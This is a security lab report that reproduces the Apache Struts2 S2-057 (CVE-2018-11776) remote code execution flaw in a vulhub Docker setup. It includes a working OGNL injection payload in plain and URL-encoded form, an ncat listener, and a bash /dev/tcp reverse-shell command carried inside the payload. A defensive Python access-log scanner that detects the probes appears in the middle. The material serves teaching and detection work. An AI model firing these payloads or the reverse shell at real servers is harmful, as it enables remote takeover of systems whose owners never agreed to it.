Middleware Security Principles and Practice 2

1 / Short-answer question

0. A Docker environment has already been set up.

1. Use the docker-compose file from the vulhub project to build an environment for reproducing Struts2 S2-057 Remote Code Execution Vulnerability (CVE-2018-11776).

(1) Docker deployment:

┌──(root💀pinginglab)-[/home/…/Test/vulhub-master/struts2/s2-057]
└─# docker-compose up -d

(2) Visit http://172.16.35.136:8080/struts2-showcase

2. Reproduce the vulnerability

(1) Construct a probe payload and request it:

/struts2-showcase/$%7B233*233%7D/actionChain1.action

(2) Construct the PoC:

${ (#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('id')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}

The PoC after URL encoding:

/struts2-showcase/$%7B%0A%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27whoami%27%29%29.%28@org.apache.commons.io.IOUtils@toString%28%23a.getInputStream%28%29%29%29%7D/actionChain1.action

The whoami command returned the name of the current user, which shows that the vulnerability is exploitable.
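From the defender's side, the tell-tale sign of S2-057 probing is an OGNL expression (`${...}` or `%{...}`) sitting in the URL path, in the position Struts treats as the action namespace, exactly as in the `${233*233}` probe above. The following script is an added example, not part of the original lab report or of vulhub: it parses Tomcat/Apache combined-format access-log lines (the log format is an assumption), percent-decodes the request path (repeatedly, so a double-encoded payload is not missed), and flags requests whose path carries OGNL markers. The log lines are constructed for the example and reuse only the probe URL from this page. Note that the vendor fix for CVE-2018-11776 is Struts 2.3.35 / 2.5.17; log detection is a compensating control, not a substitute for upgrading.

```python
"""Flag access-log requests whose URL path carries OGNL expression syntax (S2-057 probing)."""
import re
from urllib.parse import unquote

# Assumed log format: Tomcat/Apache "combined"-style access log
#   client ident user [time] "METHOD path HTTP/x" status size
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Substrings that do not belong in a legitimate Struts action namespace.
# "${" / "%{" open an OGNL expression; the others are class references and
# method names that only appear when an expression is being evaluated.
OGNL_MARKERS = ("${", "%{", "@ognl.", "@java.lang.", "getruntime(")


def decode_path(raw, max_rounds=3):
    """Percent-decode until the path stops changing (bounded), so that a
    double-encoded payload such as %2524%257B...%257D is still seen as ${...}."""
    path = raw
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def find_ognl_requests(lines):
    """Return one dict per log line whose decoded path contains an OGNL marker."""
    hits = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue  # not a recognisable access-log line; skip rather than guess
        path = decode_path(match.group("path"))
        lowered = path.lower()
        markers = [m for m in OGNL_MARKERS if m.lower() in lowered]
        if markers:
            hits.append({
                "client": match.group("client"),
                "time": match.group("time"),
                "status": match.group("status"),
                "path": path,
                "markers": markers,
            })
    return hits


# Constructed sample log lines (clients, timestamps and statuses are made up).
SAMPLE_LOG = [
    '172.16.35.1 - - [30/Jun/2022:19:37:09 +0800] '
    '"GET /struts2-showcase/$%7B233*233%7D/actionChain1.action HTTP/1.1" 302 -',
    '172.16.35.1 - - [30/Jun/2022:19:37:15 +0800] '
    '"GET /struts2-showcase/showcase.action HTTP/1.1" 200 4821',
    '10.0.0.7 - - [30/Jun/2022:19:38:02 +0800] '
    '"GET /struts2-showcase/%2524%257B233*233%257D/actionChain1.action HTTP/1.1" 302 -',
    '10.0.0.9 - - [30/Jun/2022:19:38:40 +0800] '
    '"GET /struts2-showcase/index.action HTTP/1.1" 200 1130',
]

if __name__ == "__main__":
    for hit in find_ognl_requests(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["client"]} {hit["status"]} '
              f'markers={hit["markers"]} path={hit["path"]}')
```

Running the block prints the two suspicious requests (the plain probe and the double-encoded one) and stays silent on the two ordinary showcase requests. A 302 status on a flagged request is worth a second look: in S2-057 the injected namespace is evaluated while building a redirect target, so a successful probe typically shows up as a redirect rather than an error.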

3. Get a reverse shell with nc

(1) Listen on port 5555 with ncat:

┌──(root💀pinginglab)-[/home/…/Test/vulhub-master/struts2/s2-057]
└─# ncat -lvvp 5555
Ncat: Version 7.92 ( nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555

(2) Construct the command that connects back to the listener:

bash -i >& /dev/tcp/172.16.35.136/5555 0>&1

${ (#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('bash -i >& /dev/tcp/172.16.35.136/5555 0>&1')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}

URL-encoded:

Encoded with HackBar:

4. Record the experiment process in detail, with screenshots.

5. Other Struts2 vulnerabilities may also be used.

When writing the lab report, organize the steps, results and reasoning from the whole assignment into a Word, PDF or PPT document and upload it; name the document "Name-Assignment Name".